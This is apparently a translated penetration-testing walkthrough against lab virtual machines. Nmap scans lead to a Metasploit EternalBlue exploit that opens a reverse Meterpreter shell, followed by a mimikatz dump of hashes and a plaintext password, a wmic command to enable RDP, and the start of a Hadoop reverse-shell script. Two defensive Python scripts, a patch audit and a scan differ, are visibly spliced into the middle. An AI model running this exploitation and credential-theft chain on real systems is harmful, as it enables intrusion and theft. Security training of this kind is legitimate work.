Internal Network Penetration: From Getting Started to Getting Jailed

Scenario:

A client asks you to run a security assessment of their internal network. You take the job and pin down the requirements: do not disrupt business operations, no restriction on attack techniques, and the goal is to obtain server privileges. You are given one IP range: 10.211.55.1/24.

Penetration testing workflow


Information gathering

First, configure the network of your penetration-testing environment.

Discovering live hosts

Nmap

```
(base) ➜ ~ Nmap -Pn 10.211.55.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CST
Nmap scan report for 10.211.55.0
Host is up (0.000020s latency).
All 1000 scanned ports on 10.211.55.0 are filtered
Nmap scan report for 10.211.55.1
Host is up.
All 1000 scanned ports on 10.211.55.1 are filtered
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for 10.211.55.4
Host is up (0.000025s latency).
All 1000 scanned ports on 10.211.55.4 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
Nmap scan report for 10.211.55.7
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.0011s latency).
Not shown: 991 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Nmap scan report for 10.211.55.9
Host is up (0.000018s latency).
All 1000 scanned ports on 10.211.55.9 are filtered
Nmap scan report for 10.211.55.10
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.10 are filtered
```
```
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
(base) ➜ ~
```

The sweep shows that this IP range has 3 live hosts. (Nmap reports all 256 addresses as "up" only because -Pn skips host discovery; the hosts that actually have open ports are the live ones.)

They are 10.211.55.5, 10.211.55.6 and 10.211.55.8.

Run a full-port scan against these three hosts to see which ports each of them has open.


10.211.55.5

```
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CST
Initiating ARP Ping Scan at 19:37
Scanning 10.211.55.5 [1 port]
Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:37
Scanning windows-10.shared (10.211.55.5) [65535 ports]
Discovered open port 135/tcp on 10.211.55.5
Discovered open port 139/tcp on 10.211.55.5
Discovered open port 445/tcp on 10.211.55.5
Discovered open port 49664/tcp on 10.211.55.5
Discovered open port 49669/tcp on 10.211.55.5
Discovered open port 5040/tcp on 10.211.55.5
Discovered open port 49667/tcp on 10.211.55.5
Discovered open port 49668/tcp on 10.211.55.5
Discovered open port 49665/tcp on 10.211.55.5
Discovered open port 49671/tcp on 10.211.55.5
Discovered open port 49666/tcp on 10.211.55.5
Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00018s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
MAC Address: 00:1C:42:F4:4F:FE (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.79 seconds
           Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)
```

The set of open ports indicates that this host runs Windows; next, check its OS version.

(base) ➜ ~ sudo nmap -O 10.211.55.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CST
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:1C:42:F4:4F:FE (Parallels)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds

10.211.55.6

Port scan

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CST
Initiating ARP Ping Scan at 19:41
Scanning 10.211.55.6 [1 port]
Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:41
Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]
Discovered open port 22/tcp on 10.211.55.6
Discovered open port 61616/tcp on 10.211.55.6
Discovered open port 8161/tcp on 10.211.55.6
Discovered open port 8088/tcp on 10.211.55.6
Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.000046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown
MAC Address: 00:1C:42:B7:60:2B (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

OS detection

(base) ➜ ~ sudo nmap -O 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
MAC Address: 00:1C:42:B7:60:2B (Parallels)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TM
OS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z
OS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE
OS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

10.211.55.8

Port scan

(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CST
Initiating ARP Ping Scan at 19:43
Scanning 10.211.55.8 [1 port]
Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:43
Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]
Discovered open port 445/tcp on 10.211.55.8
Discovered open port 135/tcp on 10.211.55.8
Discovered open port 139/tcp on 10.211.55.8
Discovered open port 49157/tcp on 10.211.55.8
Discovered open port 49156/tcp on 10.211.55.8
Discovered open port 49153/tcp on 10.211.55.8
Discovered open port 49155/tcp on 10.211.55.8
Discovered open port 49154/tcp on 10.211.55.8
Discovered open port 49152/tcp on 10.211.55.8
Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00010s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds
           Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)

OS detection

sudo nmap -O 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00017s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

Goby

Because Goby's packet rate was set to the maximum, running it drops the network connection and disrupts normal network use, so the scan is not shown here; the step is only indicated.

Collecting information about the client company

企查查 (Qichacha)

www.qichacha.com

Corporate portal site

In this scenario, assume we have collected e-mail addresses belonging to the client company.

Vulnerability exploitation

From the information gathered so far, we can conclude the following:

10.211.55.5 and 10.211.55.8 both run Windows.

The open ports on the Windows hosts are:

10.211.55.5
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown

10.211.55.8
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

During a penetration test, use one shell session per kind of activity: the shell used for port scanning should not also be used for vulnerability checking and exploitation. This makes it easy to export each session's log as a text file and hand it to the client.

Since port 445 is open, a preliminary assumption is that the MS17-010 (EternalBlue) vulnerability may be present.

To verify and exploit the vulnerability, use Metasploit and first run the module's check against the target.


Verification shows that 10.211.55.5 is not vulnerable to MS17-010.



Verification shows that 10.211.55.8 is vulnerable to MS17-010; run the exploit against it.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8
rhosts => 10.211.55.8
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.211.55.8:445 - Connecting to target for exploitation.
[+] 10.211.55.8:445 - Connection established for exploitation.
[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)
[*] 10.211.55.8:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.211.55.8:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 10.211.55.8:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.
[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet
[*] 10.211.55.8:445 - Starting non-paged pool grooming
[+] 10.211.55.8:445 - Sending SMBv2 buffers
[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.211.55.8:445 - Sending final SMBv2 buffers.
[*] 10.211.55.8:445 - Sending last fragment of exploit packet!
[*] 10.211.55.8:445 - Receiving response from exploit packet
[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.211.55.8:445 - Sending egg to corrupted connection.
[*] 10.211.55.8:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >


Next, grab the account login passwords from the target host:

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ???????? 2:

   Connection-specific DNS Suffix  . : localdomain
   IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
   Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
   Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14
   IPv4 Address. . . . . . . . . . . : 10.211.55.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14
                                       10.211.55.1

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          return0;
Registered Organization:   
Product ID:                00426-384-1216344-06000
Original Install Date:     2020/7/13, 1:45:07
System Boot Time:          2020/8/8, 14:45:29
System Manufacturer:       Parallels Software International Inc.
System Model:              Parallels Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 Mhz
BIOS Version:              Parallels Software International Inc. 15.1.4 (47270), 2020/4/13
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              en-us;English (United States)
Time Zone:                 N/A
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,313 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,308 MB
Virtual Memory: In Use:    881 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Parallels Ethernet Adapter
                                 Connection Name: 本地链接 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.211.55.1
                                 IP address(es)
                                 [01]: 10.211.55.8
                                 [02]: fe80::7002:eaf9:c043:7b1b
                                 [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
                                 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
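The systeminfo output above lists only two hotfixes, both far older than 2017, which is consistent with the MS17-010 check succeeding earlier on this host. From the defender's side, the same output is exactly what a patch-compliance audit consumes. The following Python is an added example, not code from the original post: it parses systeminfo text, extracts the OS version and the installed KB list, and reports whether one of the March 2017 MS17-010 packages for that Windows generation is present. The KB-to-OS table is my own and covers only the Windows 6.x family; the sample input is constructed from the page's output. A host on which a later cumulative rollup has replaced the March 2017 package will list neither KB, so treat "missing" as "needs review" rather than "vulnerable".

```python
import re

# March 2017 MS17-010 packages per Windows NT version family. This table is
# an assumption made for the example; later monthly rollups supersede these
# KBs under different numbers, so "missing" means "review", not "vulnerable".
MS17_010_KBS = {
    "6.0": ("KB4012598",),              # Windows Vista / Server 2008
    "6.1": ("KB4012212", "KB4012215"),  # Windows 7 SP1 / Server 2008 R2 (security-only / rollup)
    "6.2": ("KB4012214", "KB4012217"),  # Windows 8 / Server 2012
    "6.3": ("KB4012213", "KB4012216"),  # Windows 8.1 / Server 2012 R2
}

OS_VERSION_RE = re.compile(r"^OS Version:\s*(\d+\.\d+\.\d+)", re.MULTILINE)
SYSTEM_TYPE_RE = re.compile(r"^System Type:\s*(\S+)", re.MULTILINE)
KB_RE = re.compile(r"\bKB\d{6,7}\b")


def parse_systeminfo(text):
    """Pull the fields the audit needs out of `systeminfo` output."""
    version = OS_VERSION_RE.search(text)
    system_type = SYSTEM_TYPE_RE.search(text)
    # Only the Hotfix(s) section carries KB numbers in systeminfo output,
    # so a document-wide findall is sufficient.
    return {
        "os_version": version.group(1) if version else None,
        "system_type": system_type.group(1) if system_type else None,
        "hotfixes": sorted(set(KB_RE.findall(text))),
    }


def ms17_010_patch_status(text):
    """Classify a host by whether a known MS17-010 package is installed."""
    info = parse_systeminfo(text)
    if not info["os_version"]:
        return dict(info, family=None, expected=[], status="no-os-version")
    family = ".".join(info["os_version"].split(".")[:2])   # "6.1.7601" -> "6.1"
    expected = MS17_010_KBS.get(family)
    if expected is None:
        status = "os-family-not-in-table"
    elif set(expected) & set(info["hotfixes"]):
        status = "ms17-010-kb-present"
    else:
        status = "ms17-010-kb-missing"
    return dict(info, family=family, expected=list(expected or ()), status=status)


# Constructed sample, abridged from the systeminfo output shown above.
SAMPLE_SYSTEMINFO = """\
Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Domain:                    WORKGROUP
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
"""

if __name__ == "__main__":
    report = ms17_010_patch_status(SAMPLE_SYSTEMINFO)
    print(report["os_version"], report["system_type"], report["status"])
    print("installed:", ", ".join(report["hotfixes"]))
```

Run as a script it prints the version, architecture and a status of ms17-010-kb-missing for the sample; feeding it a systeminfo capture that contains KB4012212 or KB4012215 flips the status to present.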


Host enumeration shows that the target is a 64-bit system, so upload the 64-bit mimikatz.exe to dump passwords.

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 73647 (00000000:00011faf)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username : return0
         * Domain   : RETURN0FA54
         * LM       : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM     : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1     : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        wdigest :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        kerberos :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 73594 (00000000:00011f7a)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username : return0
         * Domain   : RETURN0FA54
         * LM       : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM     : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1     : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        wdigest :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        kerberos :
         * Username : return0
         * Domain   : RETURN0FA54
         * Password : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : RETURN0FA54$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : return0fa54$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30280 (00000000:00007648)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : RETURN0FA54$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : return0fa54$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :


Earlier reconnaissance showed that port 3389 was not open, so a Remote Desktop login was not possible; use the following command to enable it.

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Scanning the host again with Nmap shows that port 3389 is now open.

(base) ➜ ~ sudo nmap -O 10.211.55.8
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00018s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds
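The port scans in the information-gathering section and the two -O scans of 10.211.55.8 (before and after Remote Desktop was switched on) are the kind of output a defender wants to compare mechanically rather than by eye: which hosts in a sweep actually expose services, and which ports changed between two scans of the same host. The following Python is an added example and not part of the original post. It parses Nmap's normal output as printed on this page (report headers with or without a hostname, PORT/STATE/SERVICE rows, and the "All N scanned ports ... are filtered" summaries), lists the hosts with at least one open port, and diffs two scans of one host so that a newly opened 3389/tcp stands out. The sample texts are constructed from the page's own scan output, abridged to a few hosts and ports; the function names are mine.

```python
import re

# "Nmap scan report for host (1.2.3.4)" or "Nmap scan report for 1.2.3.4"
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s*$"
)
# "445/tcp   open  microsoft-ds"
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_nmap(text):
    """Map each scanned IP to its hostname and open ports {port: service}.

    A host reported as 'All N scanned ports ... are filtered/closed' gets an
    entry with an empty port table, which distinguishes it from a host that
    was never scanned at all.
    """
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip")
            hosts[current] = {"name": m.group("name"), "open": {}}
            continue
        m = PORT_RE.match(line)
        # Only a plain 'open' counts; 'closed' and UDP's 'open|filtered' are ignored.
        if m and current is not None and m.group("state") == "open":
            hosts[current]["open"][int(m.group("port"))] = m.group("service")
    return hosts


def _ip_key(ip):
    return tuple(int(octet) for octet in ip.split("."))


def hosts_with_open_ports(hosts):
    """IPs that expose at least one service, in address order."""
    return sorted((ip for ip, h in hosts.items() if h["open"]), key=_ip_key)


def port_delta(before, after, ip):
    """Ports that appeared or disappeared between two scans of the same host."""
    b = set(before.get(ip, {}).get("open", {}))
    a = set(after.get(ip, {}).get("open", {}))
    return {"opened": sorted(a - b), "closed": sorted(b - a)}


# Constructed samples, abridged from the scans shown on this page.
SWEEP = """\
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
Nmap scan report for 10.211.55.7
All 1000 scanned ports on 10.211.55.7 are filtered
Nmap scan report for windows-7sp1.shared (10.211.55.8)
PORT    STATE SERVICE
135/tcp open  msrpc
445/tcp open  microsoft-ds
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
"""

BEFORE_RDP = """\
Nmap scan report for windows-7sp1.shared (10.211.55.8)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
"""

AFTER_RDP = BEFORE_RDP + "3389/tcp  open  ms-wbt-server\n"

if __name__ == "__main__":
    print("hosts with services:", hosts_with_open_ports(parse_nmap(SWEEP)))
    delta = port_delta(parse_nmap(BEFORE_RDP), parse_nmap(AFTER_RDP), "10.211.55.8")
    print("10.211.55.8 delta:", delta)
```

Feeding the full sweep from the top of the page into parse_nmap reduces the 256 "hosts up" to the three that matter, and running port_delta over periodic scans of a host is a cheap way to notice a service such as RDP being switched on outside of change control.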

With port 3389 open, use the captured password to log in over Remote Desktop.

Login to the Windows 7 SP1 system succeeds.

10.211.55.6 runs Ubuntu Linux

Its open ports are:

PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown

Port 8088 serves a web application; opening it in a browser reveals a Hadoop interface that can be reached without authentication.

This unauthenticated Hadoop access can be used to obtain a shell on the server.

Reverse-shell exploit

# -*- coding: utf-8 -*-
# author: return0;
import requests

target = 'http://10.211.55.6:8088/'  # address of the target host
